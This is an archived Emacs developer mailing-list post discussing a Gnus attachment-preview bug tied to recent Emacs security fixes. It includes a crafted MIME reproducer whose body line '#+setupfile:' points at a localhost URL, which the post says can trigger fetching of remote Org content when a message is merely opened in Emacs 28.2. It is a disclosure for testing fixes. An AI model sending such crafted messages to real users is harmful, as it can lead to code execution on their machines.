From mboxrd@z Thu Jan 1 00:00:00 1970 Path: news.gmane.io!.POSTED.blaine.gmane.org!not-for-mail From: Max Nikulin Newsgroups: gmane.emacs.devel Subject: Re: Reproducers for recent Emacs security issues Date: Tue, 16 Apr 2024 11:35:50 +0700 Message-ID: <46e44c5c-47e0-4bfd-b90d-ad8a3f82b33d@gmail.com> References: <875xwk8w5w.fsf@melete.silentflame.com> <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com> <87cyqrf01x.fsf@melete.silentflame.com> <87mspv6kf0.fsf@localhost> <87y19fdklq.fsf@melete.silentflame.com> <87wmoy6dkl.fsf@localhost> <87edb6328y.fsf@mid.deneb.enyo.de> <8734rmmcfg.fsf@ust.hk> Mime-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Injection-Info: ciao.gmane.io; posting-host="blaine.gmane.org:116.202.254.214"; logging-data="32685"; mail-complaints-to="usenet@ciao.gmane.io" User-Agent: Mozilla Thunderbird Cc: Sean Whitton To: "emacs-devel@gnu.org" Original-X-From: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Tue Apr 16 06:36:51 2024 Return-path: Envelope-to: ged-emacs-devel@m.gmane-mx.org Original-Received: from lists.gnu.org ([209.51.188.17]) by ciao.gmane.io with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.92) (envelope-from ) id 1rwaYs-0008Kj-N7 for ged-emacs-devel@m.gmane-mx.org; Tue, 16 Apr 2024 06:36:50 +0200 Original-Received: from localhost ([::1] helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1rwaY4-0007sK-6M; Tue, 16 Apr 2024 00:36:00 -0400 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rwaY2-0007rt-Ee for emacs-devel@gnu.org; Tue, 16 Apr 2024 00:35:58 -0400 Original-Received: from mail-lf1-x12c.google.com ([2a00:1450:4864:20::12c]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.90_1) (envelope-from ) id 1rwaY0-0002nk-JG for emacs-devel@gnu.org; Tue, 16 Apr 2024 00:35:58 -0400 Original-Received: by mail-lf1-x12c.google.com with SMTP id 2adb3069b0e04-516d264d0e4so4989599e87.0 for ; Mon, 15 Apr 2024 21:35:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20230601; t=1713242152; x=1713846952; darn=gnu.org; h=content-transfer-encoding:in-reply-to:cc:to:from:content-language :references:subject:user-agent:mime-version:date:message-id:sender :from:to:cc:subject:date:message-id:reply-to; bh=ZlfRKG5WN/tg1AvYLg/e3py3LHSIe6UPHOLQqySDPB4=; b=SxmfYHyVT9VF71O8mSZRhN7EtiImMNk/yuTZPkfkEFgtkgL2ZF2Lhs3gEHiuwfRx+H Y/UoGD2mpPUDJkumyAuBoneK4CdMJgbZA8om+AJ4l8YS7UmB3ZkzboVdozl1gHzPP+Tj MNLlyq52UU9iR2hlsv8gWtQVIPOgpIXAF2Zxk7A/JDMzc5ZU/HCX+E1a5pFSrKXvZfAV BSfXSt13yy+Nqsa/fMG3eNAHxK7OD3TDfDhiMMd/tl4YIBB9eEnHD8pdiz9zazAwdJvm 7wtvx/3Dz8wN9tQxShyRuBoXY3ruw2DhjDIV2+WjIfh1NoF8MU0UIYEYSbk4Zxnh3eNK /hMA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1713242152; x=1713846952; h=content-transfer-encoding:in-reply-to:cc:to:from:content-language :references:subject:user-agent:mime-version:date:message-id:sender :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to; bh=ZlfRKG5WN/tg1AvYLg/e3py3LHSIe6UPHOLQqySDPB4=; b=CF8c5+jnFWh8KxUFSyAGC6q2Y1RnJEb+LkMBdfOZEkIXHf2Z+qjCbKy/jLOeoIIndd hx6xkTlGsQTYWsaqFciHzt/BVqSwqtvzxDiw6JTWauX9OHK9rDqYpXqgKJejbzj1BjmZ 5QCR43LgG6YWPzx3Xj6gb3Dabqyronnt92pxSCw5aWai9TUorV1Mbuu6TC4t769+v5cy FT0hTYmlsvI9IQtXLYPhzLi68Zp+TYCOcgbfmbLEDRKlEmdFKcuMPzNJBwKuLGhTNcCs MS0q9QsMLVv2Cde6CJq34i1dffkGuBMDZwxFuHr6bwZOfHWvkFnaQmry9KCWshQ5KqEU dbOg== X-Gm-Message-State: AOJu0YwvwI4ybSgOmIbjqZ72vt3dz7O9h+qyC6OYU987hh4nrntAa5AA vZ6w0lPdHvhbWUgaTdSc9fAUP5qS/g/Vl9VWav0MicdwOTwZc/WFV3N5Yqwf X-Google-Smtp-Source: AGHT+IG689ERamfIAHR8P95/ZhFcSO/MtBEF4nkEqwQxhTePoRTGuwFnTKtgl7Y+780WDWofBLac4g== X-Received: by 2002:a05:6512:12c9:b0:515:89db:9dbb with SMTP id p9-20020a05651212c900b0051589db9dbbmr459931lfg.34.1713242152136; Mon, 15 Apr 2024 21:35:52 -0700 (PDT) Original-Received: from [192.168.0.102] (nat-0-0.nsk.sibset.net. [5.44.169.188]) by smtp.googlemail.com with ESMTPSA id z18-20020a19f712000000b00518e3a194e9sm518301lfe.304.2024.04.15.21.35.51 (version=TLS1_3 cipher=TLS_AES_128_GCM_SHA256 bits=128/128); Mon, 15 Apr 2024 21:35:51 -0700 (PDT) Content-Language: en-US, ru-RU In-Reply-To: <8734rmmcfg.fsf@ust.hk> Received-SPF: pass client-ip=2a00:1450:4864:20::12c; envelope-from=manikulin@gmail.com; helo=mail-lf1-x12c.google.com X-Spam_score_int: 12 X-Spam_score: 1.2 X-Spam_bar: + X-Spam_report: (1.2 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, FREEMAIL_FROM=0.001, RCVD_IN_DNSWL_NONE=-0.0001, RCVD_IN_SBL_CSS=3.335, SPF_HELO_NONE=0.001, SPF_PASS=-0.001 autolearn=no autolearn_force=no X-Spam_action: no action X-BeenThere: emacs-devel@gnu.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: "Emacs development discussions." List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Original-Sender: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Xref: news.gmane.io gmane.emacs.devel:317745 Archived-At: On 16/04/2024 06:30, Andrew Cohen wrote: >>>>>> "FW" == Florian Weimer writes: > FW> It's a feature. [...] > I stand corrected---this still looks quite useful and seems to be > working as intended. I am not trying to dispute that attachment preview is a useful feature and it is nice to have syntax highlight. I still believe, its implementation is buggy and behavior may confuse those who test fixes for the recent security vulnerabilities. Consider the following message: ---- 8< ---- To: A User From: Attacker Subject: Gnus inline attachment preview is buggy Date: Mon, 15 Apr 2024 17:47:53 +0000 Message-ID: <123@example.org> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="------------si3r85hbIUHz9WH" This is a multi-part message in MIME format. --------------si3r85hbIUHz9WH Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * The *following* line should not affect attachment preview: #+setupfile: http://localhost:8000/setup-1234567890.org - =text/plain= body :: should not be fonified as an Org mode buffer. --------------si3r85hbIUHz9WH Content-Type: text/x-org; charset=UTF-8; name="test.org" Content-Disposition: attachment; filename="test.org" Nothing dangerous or suspicious here. --------------si3r85hbIUHz9WH-- ---- >8 ---- Message body should be presented as plain text and its content should not affect attachment and should not be interpreted as Org mode markup. What I see in Emacs-28.2 is that text/plain message body is fontified as an Org mode buffer, even "#+setupfile:" is interpreted by Org mode code. I do not mind that the attachment is invisible when I open the message. What I really do not like is that some code is executed for invisible content. The attachment should be rendered when the user opens it, not when the message is opened. In Emacs-28.2 a *folded* *attachment* may cause interpretation of "#+setupfile:" in the text/plain *body* as Org markup and may lead to execution of arbitrary code downloaded from a remote site immediately when user opens message without additional user actions. From my point of view, *risk* of an attack requiring opening an attachment is significantly lower than one when it is enough to just open mail message. I admit that *impact* measured using Common Vulnerability Scoring System (CVSS) v3.1 is the same. In both cases user action is required.